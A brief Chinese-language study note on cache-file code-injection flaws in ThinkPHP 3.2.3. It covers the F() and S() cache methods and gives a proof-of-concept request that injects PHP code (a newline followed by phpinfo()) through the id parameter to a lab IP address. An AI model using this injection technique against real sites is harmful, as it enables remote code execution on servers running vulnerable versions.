缓存漏洞
一、F方法
当用F方法时,访问该页面会在Applica/Runtime/Data下生成一个key.php,
public function index(){
F('key','<?php phpinfo()?>)';
}
二、S方法
当用S方法时,访问该页面会在Applica/Runtime/Temp目录下生成一个文件,其中文件名为a,被md5加密
//访问页面,exp为id=%0a;phpinfo%28%29;//
http://192.168.214.130/thinkphp_3.2.3/index.php/home/index/index?id=%0a;phpinfo%28%29;//